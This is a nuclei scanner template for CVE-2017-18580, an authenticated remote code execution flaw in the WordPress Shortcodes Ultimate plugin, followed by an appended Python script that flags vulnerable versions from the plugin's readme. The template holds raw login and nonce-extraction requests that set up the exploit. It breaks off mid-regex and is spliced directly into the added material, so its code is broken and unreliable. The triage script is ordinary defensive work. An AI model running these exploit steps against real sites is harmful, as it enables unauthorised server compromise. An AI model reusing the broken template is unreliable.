id: CVE-2017-18580

info:
  name: WordPress Shortcodes Ultimate <= 5.0.0 - Authenticated Remote Code Execution
  author: 0x_Akoko
  severity: critical
  description: |
    The Shortcodes Ultimate plugin before 5.0.1 for WordPress contains a remote code execution vulnerability via a filter in the meta, post, or user shortcode. An authenticated attacker who can submit crafted shortcode data can execute arbitrary code on the server.
  impact: |
    Remote attackers can execute arbitrary code on the server, potentially leading to full site compromise.
  remediation: |
    Update to version 5.0.1 or later.
  reference:
    - https://wpscan.com/vulnerability/efad59c8-e6ae-4167-9c78-d3ea52fe5bba/
    - https://plugins.trac.wordpress.org/changeset/1756323/shortcodes-ultimate
    - https://blog.sucuri.net/2017/11/formidable-forms-shortcodes-ultimate-exploits-in-the-wild.html
    - https://nvd.nist.gov/vuln/detail/CVE-2017-18580
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2017-18580
    cwe-id: CWE-94
    epss-score: 0.70003
    epss-percentile: 0.98696
  metadata:
    verified: true
    max-request: 4
    vendor: developer_developer
    product: shortcodes-ultimate
    framework: wordpress
    publicwww-query: "/wp-content/plugins/shortcodes-ultimate/"
  tags: cve,cve2017,wordpress,wp-plugin,shortcodes-ultimate,rce,authenticated,oast,wp,vkev

flow: http(1) && http(2) && http(3) && http(4)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(header, "wordpress_logged_in")
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-admin/post-new.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, "_wpnonce")
        condition: and
        internal: true

    extractors:
      - type: regex
        name: nonce
        part: body
        internal: true
        group: 1
        regex:
          - 'metabox-base-form">\s*
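The template above is an active, authenticated check (it needs valid credentials and a nonce before it can exercise the shortcode). A practitioner triaging many sites often wants a cheaper, unauthenticated first pass based on the remediation line: anything reporting a version below 5.0.1 is a candidate. The following is an added example, not part of the nuclei template or of the plugin's own code. It assumes the WordPress.org convention that a plugin exposes `readme.txt` under its plugin directory (here `/wp-content/plugins/shortcodes-ultimate/readme.txt`) with a `Stable tag:` line; the `fetch_readme` helper and the sample readme texts are constructed for illustration. A readme-reported version can lag the installed code, so treat a hit as a lead for the authenticated check, not as confirmation.

```python
"""
Passive version triage for CVE-2017-18580 (Shortcodes Ultimate < 5.0.1).

Added example; not part of the nuclei template above. Assumes the
WordPress.org readme convention ("Stable tag: x.y.z") and the standard
plugin path. Sample readme contents below are constructed, not captured.
"""
import re
import sys
import urllib.request
from typing import Optional, Tuple

FIXED_VERSION = "5.0.1"  # from the template's remediation: update to 5.0.1 or later
# Assumed location; matches the plugin slug used in the template's publicwww-query.
README_PATH = "/wp-content/plugins/shortcodes-ultimate/readme.txt"

# "Stable tag: 5.0.0" (case-insensitive, one per line). A non-numeric tag such
# as "trunk" deliberately does not match, so it is reported as unknown.
_STABLE_TAG = re.compile(
    r"^[ \t]*Stable tag:[ \t]*([0-9][0-9A-Za-z.\-]*)[ \t]*$",
    re.IGNORECASE | re.MULTILINE,
)


def parse_version(version: str) -> Tuple[int, ...]:
    """Turn '5.0.1' (or '5.0.1-beta') into a comparable tuple of ints.

    Each dot-separated piece contributes its leading integer; parsing stops at
    the first piece with no leading digits, so '5.0.1-beta' -> (5, 0, 1).
    """
    parts = []
    for piece in version.split("."):
        m = re.match(r"\d+", piece)
        if not m:
            break
        parts.append(int(m.group()))
    return tuple(parts)


def extract_stable_tag(readme: str) -> Optional[str]:
    """Return the Stable tag value from a readme.txt body, or None if absent/non-numeric."""
    m = _STABLE_TAG.search(readme)
    return m.group(1) if m else None


def is_vulnerable_version(version: str) -> bool:
    """True when the reported version is strictly below the fixed release."""
    return parse_version(version) < parse_version(FIXED_VERSION)


def assess_readme(readme: str) -> dict:
    """Classify a readme body as vulnerable / not-vulnerable / unknown."""
    tag = extract_stable_tag(readme)
    if tag is None:
        return {"version": None, "status": "unknown"}
    status = "vulnerable" if is_vulnerable_version(tag) else "not-vulnerable"
    return {"version": tag, "status": status}


def fetch_readme(base_url: str, timeout: float = 10.0) -> str:
    """Fetch the plugin readme from a live site (not used by the offline samples)."""
    url = base_url.rstrip("/") + README_PATH
    with urllib.request.urlopen(url, timeout=timeout) as resp:  # nosec: triage tool
        return resp.read().decode("utf-8", errors="replace")


# Constructed sample readme bodies, shaped like a WordPress.org readme.txt.
SAMPLE_README_VULN = """=== Shortcodes Ultimate ===
Tags: shortcodes
Requires at least: 3.5
Stable tag: 5.0.0
License: GPLv3
"""

SAMPLE_README_FIXED = """=== Shortcodes Ultimate ===
Tags: shortcodes
Requires at least: 3.5
Stable tag: 5.0.1
License: GPLv3
"""

if __name__ == "__main__":
    if len(sys.argv) > 1:
        print(assess_readme(fetch_readme(sys.argv[1])))
    else:
        for name, body in (("vuln", SAMPLE_README_VULN), ("fixed", SAMPLE_README_FIXED)):
            print(name, assess_readme(body))
```

Run with a base URL (`python triage.py https://example.invalid`) to fetch the readme from a site you are authorised to test, or with no arguments to exercise the constructed samples. The strict less-than comparison means `5.0.1`, `5.1`, and any later release are reported as not vulnerable, while `5.0` and every `4.x` are flagged; a `Stable tag: trunk` readme is reported as unknown rather than guessed.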